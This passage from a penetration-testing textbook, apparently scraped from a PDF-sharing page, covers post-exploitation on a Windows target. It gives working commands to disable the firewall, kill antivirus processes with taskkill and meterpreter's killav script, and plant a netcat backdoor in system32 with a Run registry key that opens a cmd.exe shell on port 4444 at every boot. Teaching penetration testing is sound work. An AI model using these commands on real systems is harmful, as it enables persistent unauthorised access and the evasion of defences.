Ethical Hacking and Penetration Testing Guide
Cracking the Hashes to Gain Access to Other Services
Yüklə 22,44 Mb. Pdf görüntüsü
|
- Bu səhifədəki naviqasiya:
- Cracking the Hashes to Gain Access to Other Services
- Disabling the Firewall
- Killing the Antivirus
|
Cracking the Hashes to Gain Access to Other Services
The second approach we would talk about is obtaining the hashes and then cracking them to gain access other services such as remote desktop, VNC, or telnet. This approach is not a very stealthy approach as the administrator may notice the changes you make. Considering that many users are allowed access to that particular service, this might work for us too. Backdoors Let’s talk about backdoors first. There are several backdoors that we would manually upload to our target machine and then make changes to the registry so that we can access it even when the computer reboots. But before installing a backdoor, we should make sure that we have turned 242 ◾ Ethical Hacking and Penetration Testing Guide off the victim’s security features such as the firewall and antivirus. Another way around this is to simply encode our backdoor so that it evades the antivirus. Let’s see how to go about with these approaches. Disabling the Firewall The reason we want to disable the firewall is that we don’t want it to interrupt us while we perform our postexploitation process. From our meterpreter shell, we would issue the “ shell ” command to launch Windows com- mand prompt. From the Windows command prompt we issue the following command to turn off the firewall: netsh firewall set opmode disable Killing the Antivirus The reason we want to disable the antivirus is that we don’t want it to identify/delete our back- door; we want to remain undetected while conducting our penetration test. We can check for the installed antivirus by typing the “ net start ” command and “ tasklist/svc ” from the command prompt to check for the process the antivirus is running. Output of “ net start ” command Output of “ tasklist/svc ” command Now we can use the “ taskkill ” command to kill a particular process or let meterpreter automate it for us. In meterpreter, we can find a script named “ killav ” that will automatically kill all the processes associated with an antivirus. Let’s view the contents of the script by using the “ cat ” command followed by the path of the script: cat/opt/metasploit/msf3/scripts/meterpreter/killav.rb Postexploitation ◾ 243 From the output we can see that the script works by closing a process associated with an anti- virus. Though it covers lots of antiviruses, it is possible that the victim’s antivirus is not in the list; in that case you need to manually identify the antivirus process and then add that process name to the script for it to work. In this way you can also help the community improve the script. To run this script, all we need to do is execute the following command from the meterpreter shell: meterpreter>kill av Netcat Netcat is one of the oldest backdoors that exist. By uploading netcat to the victim’s computer we would open up a port on a victim on which it would listen to connections, and from our attacker machine we would simply connect with that port to obtain a command prompt. The netcat is located in the /pentest/windows-binaries/tools/ directory in BackTrack. Command : meterpreter>upload/pentest/windows-binaries/tools/nc.exe C:\\windows\\ system32 This command would upload netcat to the system32 directory. Next, we need to set up netcat to load the backdoor on system boot, so we can connect it every time we want; to do that we would edit the following registry key: meterpreter > reg setval –k HKLM\\software\\microsoft\\windows\\ currentversion\\run –d ‘C:\windows\system32\nc.exe -Ldp 4444 -e cmd.exe’ –v netcat 244 ◾ Ethical Hacking and Penetration Testing Guide So the command basically sets the registry key to netcat , which on every reboot listens for connections on port 4444 . We can now connect to our target machine from our attacker machine by netcat, and it will bring the command prompt. Yüklə 22,44 Mb. Dostları ilə paylaş:
|